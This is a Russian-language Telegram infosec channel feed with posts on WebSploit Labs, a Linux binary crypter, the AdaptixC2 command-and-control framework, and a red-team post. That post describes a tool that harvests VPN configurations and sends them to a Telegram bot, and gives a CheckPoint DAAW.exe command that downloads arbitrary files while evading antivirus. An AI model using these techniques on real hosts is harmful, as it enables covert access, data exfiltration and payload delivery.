Fsecurity | HH
2.01K subscribers
1.77K photos
108 videos
64 files
6.42K links
Канал про ИБ
Наш Discord: https://discord.gg/Eg8aDS7Hn7
Пожертвовать:
> https://www.donationalerts.com/r/xackapb
Download Telegram
WebSploit Labs - это учебная среда, созданная Омаром Сантосом для проведения различных тренингов по кибербезопасности, этическому взлому, поиску ошибок, реагированию на инциденты, цифровой криминалистике и поиску угроз. WebSploit Labs включает в себя несколько намеренно уязвимых приложений, работающих в контейнерах Docker поверх Kali Linux или Parrot Security OS, несколько дополнительных инструментов и более 9000 ресурсов для обеспечения кибербезопасности.

WebSploit Labs используется многими колледжами и университетами в разных странах. В нем содержится более 500 различных упражнений!

🔗Ссылка:
https://websploit.org/
👨‍💻 Файловая система Linux. Описание на русском

#doc #cheatsheet #linux
Please open Telegram to view this post
VIEW IN TELEGRAM
👍2
Discord сервер
👆🏻Тут можно пообщаться и найти много полезной информации 🦈
Forwarded from Proxy Bar
BinCrypter
*
Linux Binary Runtime Crypter - in BASH!
*
Link
Малварь рисёрчеры и реверсеры видимо тоже скоро следом за веберами пойдут на курсы пекарей, электриков и плотников? 🤨
LaurieWired скрестила Ghidra с LLM. Получилось очень хорошо.
Ссылка на проект тут.
👍1
Discord сервер
👆🏻Тут можно пообщаться и найти много полезной информации 🦈
Forwarded from Adaptix Framework
AdaptixC2 v0.3 is out

https://github.com/Adaptix-Framework/AdaptixC2

New:
* Linking Agents (eg SMB)
* Sessions Graph
* Agent marker
* Health checker
* And more in the changelog

https://adaptix-framework.gitbook.io/adaptix-framework/changelog/v0.2-greater-than-v0.3

Репост/перепост приветствуется😉
Discord сервер
👆🏻Тут можно пообщаться и найти много полезной информации 🦈
2
Forwarded from s0ld13r ch. (s0ld13r)
Кто любит VPN?! 😆

Последние дни я размышлял об аналитике в Red Team. В ходе операций важно проводить качественную энумерацию — даже мелкие находки могут усилить атаку. Так я задумался о корпоративных VPN 🤔

Доступ к VPN расширяет возможности для пивотинга и эскалации атаки. Я решил исследовать, как злоумышленник или Red Team могут использовать стандартные VPN-клиенты для разведки на хосте и обхода AV 🔫

Нашел пару use кейсов на примере клиента CheckPoint VPN:

В лог файле агента`C:\Program Files (x86)\CheckPoint\Endpoint Connect\trac.log` конфигурации подключения trac.config могут быть записаны в нешифрованном виде, что может дать информацию о VPN пирах, пользователе, типе подключения, есть ли 2FA и до каких подсетей может достучаться атакуемый пользователь 🤣

В качестве PoC написал инструмент для поиска конфигов на хосте 😠

Chocopie is a tool designed for reconnaissance on a host system, specifically to check for the presence of VPN configuration files. It scans the system drive (`C:\Users\`) for OpenVPN configuration files (`.ovpn`) and extracts VPN-related configurations from CheckPoint Endpoint Connect logs. The found data is then automatically sent to a Telegram bot.


Второй кейс, есть возможность загрузить любой файлик с интернета при помощи компонента VPN агента на хост. Бинарь который способен скачать файл DAAW.exe (PoC ниже)

❗️ File Drop via Check Point VPN binaries:

C:\Program Files (x86)\CheckPoint\Endpoint Connect\DAAW.exe -url <URL> -fileName <PATH>


Техника спалится в EDR из-за шумных флагов, но все же прикольный способ учитывая что обычный AV на него не ругнется из за чистых сигнатур.

P.S Использовать только в целях изучения, автор против неправомерных действий без согласия владельцев систем

@s0ld13r_ch
Please open Telegram to view this post
VIEW IN TELEGRAM
Discord сервер
👆🏻Тут можно пообщаться и найти много полезной информации 🦈
Discord сервер
👆🏻Тут можно пообщаться и найти много полезной информации 🦈